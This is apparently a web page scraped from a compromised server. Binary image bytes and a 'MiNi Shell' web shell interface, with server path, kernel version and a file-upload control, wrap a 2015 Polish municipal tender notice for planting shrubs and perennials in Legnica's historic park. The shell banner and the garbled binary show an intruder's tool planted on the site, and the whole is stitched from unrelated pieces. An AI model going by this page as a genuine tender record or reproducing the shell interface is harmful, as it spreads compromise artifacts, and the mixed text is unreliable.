JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150505/63737-N-2015.html

<p class="kh_header"><b>Legnica: Wybór Wykonawcy nasadzeń wraz z ich 5. miesięczną pielęgnacją w pasie zieleni w al. Orła Białego  w ramach  zadania  inwestycyjnego pn. Rewitalizacja zabytkowego Parku Miejskiego w Legnicy</b><br>
<b>Numer ogłoszenia: 63737 - 2015; data zamieszczenia: 05.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Legnicy , pl. Słowiański 8, 59-220 Legnica, woj. dolnośląskie, tel. 076 7212100, faks 076 7212115.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.bip.legnica.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór Wykonawcy nasadzeń wraz z ich 5. miesięczną pielęgnacją w pasie zieleni w al. Orła Białego  w ramach  zadania  inwestycyjnego pn. Rewitalizacja zabytkowego Parku Miejskiego w Legnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie nasadzeń i 5. miesięczną pielęgnację  niżej wymienionych roślin w pasie zieleni  al. Orła Białego  w  zabytkowym Parku Miejskim. Całkowita powierzchnia uprawy gleby pasa zieleni pod nasadzenie roślin wieloletnich krzewów i bylin wynosi 3.800 m2. Teren przeznaczony do sadzenia roślin  jest terenem płaskim. Krzewy i byliny będą sadzone w pasie zieleni, gdzie rosną kilkudziesięcioletnie lipy. W trakcie sadzenia nowych roślin system korzeniowy drzew, a także ich pnie nie mogą zostać uszkodzone. W związku z powyższym 100% powierzchni pasa zieleni przeznacza się pod uprawę ręczną. 

OGÓŁEM 58.811 sztuk roślin jak niżej:
Krzewy liściaste - (25.598 szt.) w tym:
BUXUS sempervirens 	Bukszpan wieczniezielony 	25.598 szt.

Byliny - zimozielone rośliny okrywowe Runianka japońska ( 21.752 szt.) w tym:
PACHYSANDRA terminalis Green Carpet 	Runianka japońska Green Carpet 	15.172 szt.
PACHYSANDRA terminalis Variegata	Runianka japońska Variegata 	6.579 szt.

Byliny pozostałe (11.462 szt.) w tym:
Achillea millefolium Purpurglut lub Paprika	Krwawnik pospolity Purpurglut lub Paprika	309 szt.
AQUILEGIA caerulea-hybr. Rotstern	Orlik mieszańcowy Rotstern	496 szt.
AQUILEGIA hybrida  Blue Jay	Orlik ogrodowy  Blue Jay	506 szt.
AQUILEGIA hybrida  Crimson Star	Orlik ogrodowy Crimson Star	292 szt.
ARCTANTHEUM arcticum Schwefelglanz 	Złocień arktyczny Schwefelglanz 	765 szt.
Asarum europaeum	Kopytnik pospolity	38 szt.
ASTER dumosus  Prof. Anton Kippenberg syn. SYMPHYOTRICHUM dumosum	Aster rozkrzewiony Prof. Anton Kippenberg 	320 szt.
ASTER dumosus  Schneckissen syn. SYMPHYOTRICHUM dumosum	Aster rozkrzewiony Schneckissen 	333 szt.
ASTIBLE chinensis Superba	Tawułka chińska Superba	398 szt.
ASTILBE x arendsii Fanal 	Tawułka arendsa Fanal 	482 szt.
CAMPANULA  glomerata	Dzwonek skupiony	955 szt.
DIANTHUS pontederae 	Goździk 	661 szt.
DORONICUM orientale Magnificum 	Omieg wschodni 	847 szt.
HELLEBORUS foetidus 	Ciemiernik cuchnący 	221 szt.
HELLEBORUS niger 	Ciemiernik biały 	190 szt.
HEMEROCALLIS hybrida Pink Damask	Liliowiec ogrodowy Pink Damask	189 szt.
HEMEROCALLIS hybrida Stella d Oro	Liliowiec ogrodowy Stella d Oro	194 szt.
HEUCHERA sanuinea Sioux Falls 	Żurawka krwista Sioux Falls 	409 szt.
IBERIS sempervirens 	Ubiorek wieczniezielony	112 szt.
KNIPHOFIA uvaria	Trytoma groniasta	60 szt.
LAVANDULA angustifolia 	Lawenda wąskolistna 	576 szt.
LEUCANTHEMUM x superbum Summer Snowball 	Złocień wielki  Summer Snowball 	292 szt.
LYSIMACHIA punctata 	Tojeść kropkowana 	454 szt.
LYSIMACHIA punctata Variegata	Tojeść kropkowana Variegata	482 szt.
NEPETA x faassenii Six Hill s Giant 	Kocimiętka Faassena  Six Hill s Giant 	510 szt.
RUDBECKIA fulgida Goldsturm	Rudbekia błyskotliwa Goldsturm	648 szt.
SALVIA nemorosa Mainacht	Szałwia omszona Mainacht	307 szt.
STACHYS bysantina 	Czyściec wełnisty 	381 szt.
YUCCA filamentosa	Jukka nitkowata	35 szt.

Wykaz prac:
- Przygotowanie gleby w pasie zieleni do dokonania nowych nasadzeń, uzupełnienie ziemią żyzną, ziemią urodzajną itd.
-Sadzenie krzewów w formie żywopłotu obwódkowego, wzdłuż zamontowanych płotków, z bukszpanu wieczniezielonego,
- Sadzenie roślin okrywowych - zimozielonej byliny runianki japońskiej - wokół pni istniejących drzew i wzdłuż żywopłotu,
- Sadzenie wieloletnich roślin ozdobnych z kwiatów i liści - bylin - zgodnie z wykonanym projektem,
- Wykonanie rocznej pielęgnacji nowo nasadzonej szaty roślinnej:
Pielęgnacja krzewów żywopłotowych liściastych (25.598  sztuk); wyszczególnienie prac:
1.	pielenie chwastów, 
2.	spulchnianie ziemi wokół roślin,
3.  podlewanie roślin wraz ze zraszaniem części nadziemnej;
 4. przycinanie krzewów nadając im pożądany kształt;
 5. wymiana uschniętych lub silnie uszkodzonych egzemplarzy na nowe zakupione od dotychczasowego dostawcy na własny koszt.
      
Pielęgnacja roślin okrywowych (21.752 sztuki); wyszczególnienie prac:
1.	pielenie chwastów, 
2.   podlewanie roślin wraz ze zraszaniem części nadziemnej,
3.  wymiana obumarłych  lub silnie uszkodzonych egzemplarzy na nowe zakupione od dotychczasowego dostawcy na własny koszt.

Pielęgnacja bylin obficie kwitnących (11.462 sztuki); wyszczególnienie prac:
1.	 pielenie chwastów, 
2.   podlewanie roślin wraz ze zraszaniem części nadziemnej,
3. wymiana obumarłych  lub silnie uszkodzonych egzemplarzy na nowe zakupione od dotychczasowego dostawcy na własny koszt.

Materiał nasadzeniowy zapewnia Zamawiający. Materiał nasadzeniowy zostanie dostarczony do miejsca nasadzeń,  tj. przy al. Orła Białego w Parku Miejskim.  

Szczegółowy opis przedmiotu zamówienia zgodnie Rozdziałem 4 siwz - projekt szaty roślinnej  i specyfikacja techniczna wykonania i odbioru robót wraz z przedmiarem robót.

Usługę należy wykonywać z należytą starannością, z zachowaniem szczególnej ostrożności, zgodnie z zasadami wiedzy ogrodniczej, technicznej, przepisami bezpieczeństwa pracy i ochrony zdrowia, obowiązującymi normami, instrukcjami i warunkami stosowania oraz innymi przepisami prawa, w tym ustawy o ochronie zabytków i opiece nad zabytkami, a także w uzgodnieniu z Zamawiającym.
     
Zaleca się przeprowadzenie wizji lokalnej, w celu dokładnego skalkulowania ceny. W przypadku stwierdzenia przez Wykonawców konieczności wykonania prac nie ujętych w opisie przedmiotu zamówienia, a stwierdzonych podczas wizji lokalnej, niezbędnych do prawidłowego wykonania przedmiotu zamówienia, mających wpływ na cenę oferty - zaleca się Wykonawcy złożenie pisemnego zapytania w trybie art. 38 ust. 1 ustawy Pzp. Roszczenia zgłoszone po wyborze najkorzystniejszej oferty nie będą uwzględnione..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie z art. 67 ust. 1 pkt 6) ustawy Pzp Zamawiający przewiduje  udzielenie zamówień  uzupełniających - max. do 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.11-2, 45.11.27.10-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 4.000,- PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniają  poniższy warunek udziału w postępowaniu:
Posiadania wiedzy i doświadczenia tj. jako Wykonawca wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 2 zamówienia polegające na wykonaniu nasadzeń wraz z pielęgnacją roślin ozdobnych, bylin i krzewów
w ilości co najmniej 45 000 szt. - każde, w tym jedno w zabytkowym parku  lub na terenie zabytkowym wpisanym do rejestru zabytków;wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi  
te zostały wykonane lub są wykonywane, oraz załączeniem dowodów, czy usługi te zostały wykonane lub są wykonywane należycie wg wzoru - załącznik nr 3 do Instrukcji dla Wykonawców-Rozdział 2 siwz wraz z załączeniem:
- dowodów tj. poświadczeń podmiotów, na rzecz których usługi zostały wykonane, potwierdzające  czy usługi te zostały wykonane lub są wykonywane należycie np. poświadczenia, referencje,  zawarte umowy wraz z oświadczeniem o ich realizacji itp. W odniesieniu do usług nadal wykonywanych ww. poświadczenia powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać ww. poświadczeń  - oświadczenie Wykonawcy 
Ocena spełnienia warunku według:
a)  oświadczenia Wykonawcy- załącznik nr 1 do Instrukcji dla Wykonawców - Rozdział 2 siwz  oraz
   b) wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, - z podaniem ich wartości, przedmiotu, dat wykonania i  podmiotów, na rzecz których usługi  te zostały  wykonane lub są wykonywane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie wg wzoru - załącznik nr 3 do Instrukcji dla Wykonawców - Rozdział 2 siwz wraz z załączeniem:
   - dowodów tj. poświadczeń podmiotów, na rzecz których usługi zostały wykonane, potwierdzające  czy usługi te zostały wykonane lub są wykonywane należycie np. poświadczenia, referencje,  zawarte umowy wraz z oświadczeniem o ich realizacji itp. W odniesieniu do usług nadal wykonywanych ww. poświadczenia powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać ww. poświadczeń  - oświadczenie Wykonawcy 

Ocena spełnienia ww. warunku dokonana zostanie  zgodnie z formułą  spełnia/nie  spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami zdolnymi do wykonania zamówienia tj. mają do dyspozycji odpowiednio wykwalifikowany personel w celu obsadzenia podanych niżej  stanowisk:
1. Ogrodnik  - 2 osoby:
a)  z min. średnim wykształceniem rolniczym lub ogrodniczym , 
b) posiadająca min 3 letnie doświadczenie zakresie wykonywania pielęgnacji roślin oraz  
c) zatrudniona na umowę o pracę w czasie realizacji zamówienia.
Ocena spełnienia warunku według :
1)  oświadczenia Wykonawcy- załącznik nr 1 do Instrukcji dla Wykonawców - Rozdział 2     siwz  oraz
2)  wykazu osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji  zawodowych, doświadczenia  i wykształcenia  niezbędnych do wykonania zamówienia potwierdzone: 
- wykształcenie: np. dyplomem, świadectwem, zaświadczeniami  o ukończonych kursach itp.
- doświadczenie: np. referencjami, zaświadczeniami pracodawcy/ów, potwierdzeniem stażu pracy potwierdzającym wykonywanie ww. usług, świadectwem pracy z zakresem wykonywanych obowiązków,  oświadczeniem - wykazem wykonywanych zadań, oświadczeniem, cv itp.
-  w stosunku do ogrodnika zatrudnienie- kserokopią umowy o pracę  lub oświadczeniem pracodawcy, 
a także zakresem wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania  tymi osobami - załącznik nr 4 do Instrukcji dla Wykonawców - Rozdział 2 siwz  

Ocena spełnienia ww. warunku dokonana zostanie  zgodnie z formułą  spełnia/nie  spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  Formularz oferty wg załączonego druku  Rozdziału  Nr 1 siwz.
2.   Oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu z art. 22 ust.1 ustawy Pzp wg załącznika nr 1 do Instrukcji dla Wykonawców- Rozdział Nr 2 siwz.
3.  Oświadczenie, że osoby wykazane w załączniku nr 4 do Instrukcji dla Wykonawców - Rozdział 2     siwz, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane  wykształcenie i  doświadczenie.  
4. Oświadczenie Wykonawcy - wskazanie części zamówienia, której wykonanie powierzy podwykonawcom - wg wzoru załącznika nr 5 do Instrukcji dla Wykonawców - Rozdział 2     siwz.
5. Oświadczenie Wykonawcy na przyjęcie warunków zmian w umowie - wg załącznika nr 6 do Instrukcji dla Wykonawców - Rozdział  2 siwz.
6.  Wypełnioną umowę  wg Rozdziału Nr  3 siwz -  wypełnienie  i  akceptacja   umowy  nie  stanowi zobowiązań   prawnych ze strony Zamawiającego.
7. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia pełnomocnictwo, w którym Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanowią i wskażą Zamawiającemu pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowanie w postępowaniu i zawarcie umowy w sprawie zamówienia publicznego. Pełnomocnictwo będzie podpisane przez osoby upoważnione do reprezentowania i podpisywania oświadczeń w imieniu Wykonawców zgodnie z dokumentami rejestracyjnymi. W przypadku niezgodności wpisu ze stanem faktycznym Wykonawcy każdy Wykonawca musi złożyć dokumenty sporządzone przez jego właściwy organ, a uprawniający daną osobę lub osoby do reprezentowania Wykonawcy i podpisywania oświadczeń w imieniu Wykonawców.
8. Jeżeli Wykonawca, zgodnie z art. 26  ust 2b ustawy Pzp w zakresie warunków określonych w pkt. 13 Instrukcji dla Wykonawców - Rozdział 2 siwz polegał będzie na wiedzy i doświadczeniu lub osobach zdolnych do wykonania zamówienia innych podmiotów, a podmioty te będą brały udział  w realizacji części zamówienia, podmioty te - każdy z podmiotów- musi przedstawić - załączyć do oferty oświadczenie i dokumenty określone w pkt.  15 Instrukcji dla Wykonawców - Rozdział  2 siwz tj: 
8.1. oświadczenie o braku podstaw do wykluczenia  z postępowania o udzielenie  zamówienia na podstawie  art. 24 ust 1 i ust 2a ustawy Pzp- wg wzoru załącznika nr 2 do Instrukcji dla Wykonawców - Rozdział  2 siwz. 
8.2  aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru,      wystawiony  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust 1 pkt 2) ustawy Pzp. 
9. Gwarancja jakości - wg wzoru wg załącznika nr 8 do Instrukcji dla Wykonawców - Rozdział  2 siwz. 
10.  Dowód wpłacenia/wniesienia wadium.
11.  Wypełniony przedmiar robót.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji- skrócenie terminu realizacji w stosunku do 30/06/2015r. - ilość dni - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z zapisami załącznika WARUNKI ZMIAN W UMOWIE - załącznik nr 6 do Instrukcji dla Wykonawców- Rozdział 2 siwz.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.bip.legnica.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Legnica, Plac Słowiański 7 , pokój nr 22- Referat Zamówień  Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2015 godzina 10:00, miejsce: Urząd Miasta Legnica, Plac Słowiański 8 , pokój nr 208.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com